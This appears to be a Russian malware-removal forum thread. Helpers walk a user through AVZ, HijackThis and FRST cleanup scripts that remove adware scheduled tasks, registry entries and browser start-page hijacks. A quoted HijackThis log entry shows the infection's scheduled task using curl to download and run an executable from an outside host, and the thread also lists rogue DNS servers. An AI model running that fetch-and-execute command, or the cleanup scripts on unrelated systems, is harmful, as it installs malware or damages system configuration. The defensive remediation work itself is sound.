здравствуйте.
через каждые 5-7 минут в браузерах открываются вкладки с сайтами на которые не пускает антивирус Dr.Web.
выполнил лечение утилитой CureIt - не помогло.
помогите пожалуйста.
здравствуйте.
через каждые 5-7 минут в браузерах открываются вкладки с сайтами на которые не пускает антивирус Dr.Web.
выполнил лечение утилитой CureIt - не помогло.
помогите пожалуйста.
Уважаемый(ая) wolya, спасибо за обращение на наш форум!
Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
Выполните скрипт в AVZ
Будет выполнена перезагрузка компьютера.Код:begin ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.'); ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); if not IsWOW64 then begin SearchRootkit(true, true); SetAVZGuardStatus(True); end; ExecuteFile('schtasks.exe', '/delete /TN "2infoblogcomynors" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "all-journalnethilxozs" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "browser-netnetrnors" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "good-journalorgcroazs" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "green5newsnetsasds" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "green5newsorgaasds" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "hit5newsnetdasds" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "hitnews1orgxcoms" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "httppanameraporscheecomkordons" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "journal-goodorgbtechs" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "linenewsorgleeboos" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "myblognewsorggasds" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "new1newsnetvzxcs" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "news-truenetzozas" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "newstop5netqnors" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "newstop5orgwnors" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "notbadnewsorgmorfs" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "youfreenewsnetncoms" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "top5newsorgenors" /F', 0, 15000, true); QuarantineFile('C:\Users\User\AppData\Local\Kometa\Application\kometa.exe',''); QuarantineFile('C:\Windows\TEMP\clearcache.dll',''); DeleteFile('C:\Windows\TEMP\clearcache.dll','32'); DeleteFile('C:\Users\User\AppData\Local\Amigo\Application\amigo.exe','32'); RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\amigo','command'); RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\ldwcoyprdg','command'); DeleteFile('C:\Users\User\AppData\Local\Kometa\Application\kometa.exe','32'); BC_ImportAll; ExecuteSysClean; BC_Activate; RebootWindows(false); end.
Выполните скрипт в AVZ
c:\quarantine.zip пришлите по красной ссылке Прислать запрошенный карантин над первым сообщением темы.Код:begin CreateQurantineArchive('c:\quarantine.zip'); end.
Пожалуйста, выполните ЕЩЕ РАЗ правила, прикрепите к сообщению НОВЫЕ логи Autologger
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
крассная ссылка не ссылка (не нажимается - это просто текст). прислать вложением?
перестали открываться окна браузера с вирусным содержимым. спасибо большое.
заметил, что пропала языковая панель и не включается через настройки. в Regedit не заходит и не показывает ошибок при его запуске. ОС на компьютере Windows 7x64.
Последний раз редактировалось wolya; 22.05.2017 в 12:13.
Перечитайте последние 2 строки сообщения хелпера и сделайте, что он просит.
WBR,
Vadim
Запустите HijackThis, расположенный в папке Autologger и пофиксите:Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.Код:O17 - HKLM\System\CCS\Services\Tcpip\..\{12DB2EE8-3CAE-4AB9-B201-E281464C8216}: NameServer = 35.177.46.238 O17 - HKLM\System\CCS\Services\Tcpip\..\{12DB2EE8-3CAE-4AB9-B201-E281464C8216}: NameServer = 46.101.28.31 O17 - HKLM\System\CCS\Services\Tcpip\..\{12DB2EE8-3CAE-4AB9-B201-E281464C8216}: NameServer = 82.202.226.203 O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{12DB2EE8-3CAE-4AB9-B201-E281464C8216}: NameServer = 35.177.46.238 O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{12DB2EE8-3CAE-4AB9-B201-E281464C8216}: NameServer = 46.101.28.31 O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{12DB2EE8-3CAE-4AB9-B201-E281464C8216}: NameServer = 82.202.226.203 O22 - Task: (Ready) curl.job - C:\Documents and Settings\Admin\Application Data\curl\curl_7_54.exe -f -s -L http://eltugno.ru/f.exe -o "C:\Documents and Settings\Admin\Application Data\curl\curl.exe" O22 - Task: (Ready) curls.job - C:\Documents and Settings\Admin\Application Data\curl\curl.exe
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
WBR,
Vadim
отчёты FRST
1. Откройте Блокнот и скопируйте в него приведенный ниже текст
2. Нажмите Файл – Сохранить какКод:CreateRestorePoint: HKU\S-1-5-21-1417001333-854245398-1801674531-500\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://ertowap.ru/?utm_source=startpage03&utm_content=117e0d6c7b95dc5e3c4d6ef9a0fa4da4&utm_term=EF09D419C3961A01B8BAF0B735D68642&utm_d=20171129 CHR HKU\S-1-5-21-1417001333-854245398-1801674531-1003\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ddadgcdmddljmpkpinkalnepdepplpkj] - hxxp://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-1417001333-854245398-1801674531-1003\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [gkcfopbmpihfnphgamgibhkdhdgnplfp] - hxxp://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-1417001333-854245398-1801674531-1003\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ledkfmfckejkemlmpckiaoaldhldfmbe] - hxxp://clients2.google.com/service/update2/crx 2018-01-10 15:31 - 2018-01-10 15:31 - 000000000 ____D C:\Documents and Settings\Admin\Local Settings\Application Data\Unnyhog 2017-11-29 17:15 - 2017-11-29 17:15 - 000000000 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\0hbPf949CCH5.exe 2017-11-29 17:17 - 2017-11-29 17:17 - 000000000 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\59PO9Birl4bJ.exe 2017-11-29 17:13 - 2017-11-29 17:17 - 000000000 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\D3Eri0Y7DUEU.exe 2017-11-29 17:17 - 2017-11-29 17:17 - 000000000 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\dcsyoUS0BfIA.exe 2017-11-29 17:26 - 2017-11-29 17:26 - 000000000 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\fvUEGf4ytjzL.exe 2017-05-05 08:37 - 2017-05-05 08:37 - 000012288 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\LUIBcjHGgrklrTwSJPPt.DLL 2017-11-29 17:08 - 2017-11-29 17:08 - 000000000 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\n48Qi09M5VtN.exe 2017-11-29 17:15 - 2017-11-29 17:15 - 000000000 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\rffGbXNoqpRw.exe 2017-11-29 17:20 - 2017-11-29 17:20 - 000000000 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\sNiQzCjLIF4B.exe 2017-11-29 17:26 - 2017-11-29 17:26 - 000000000 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\xUiw6losXNx7.exe 2017-11-29 17:08 - 2017-11-29 17:08 - 000000000 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\Y3qb4F8oUHmt.exe 2017-11-29 17:20 - 2017-11-29 17:20 - 000000000 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\Y6JGXqoGPGU5.exe Reboot:
3. Выберите папку, откуда была запущена утилита Farbar Recovery Scan Tool
4. Укажите Тип файла – Все файлы (*.*)
5. Введите имя файла fixlist.txt и нажмите кнопку Сохранить
6. Запустите FRST, нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.
[list][*]Обратите внимание: будет выполнена перезагрузка компьютера.
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
выполнил. высылаю Fixlog.txt
Проблема решена?
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
Подмены exe файлов при скачивании из интернета уже нет.
при открытии хрома открывался вот этот сайт
hxxp://pzemisa.ru/?utm_source=startp...utm_d=20171129
в настройках хрома было установлено при запуске открывать заданные страницы - список был пуст.
я переключил настройку на - открывать ранее открытые страницы.
больше эта pzemisa.ru не открывается.
пока наблюдаю. ничего подозрительного пока не вижу.
Спасибо вам большое!
Последний раз редактировалось Vvvyg; 13.01.2018 в 20:16.
10 дней прошло с момента лечения. ничего подозрительного не замечено. все вредоносные ссылки выявленные входе лечения добавил в список блокирования, что бы кто-то из домашних опять не подцепил эту заразу. думаю проблему вы решили. спасибо вам огромное!
Статистика проведенного лечения:
- Получено карантинов: 1
- Обработано файлов: 4
- В ходе лечения вредоносные программы в карантинах не обнаружены
Уважаемый(ая) wolya, наши специалисты оказали Вам всю возможную помощь по вашему обращению.
В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:
Надеемся больше никогда не увидеть ваш компьютер зараженным!
Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.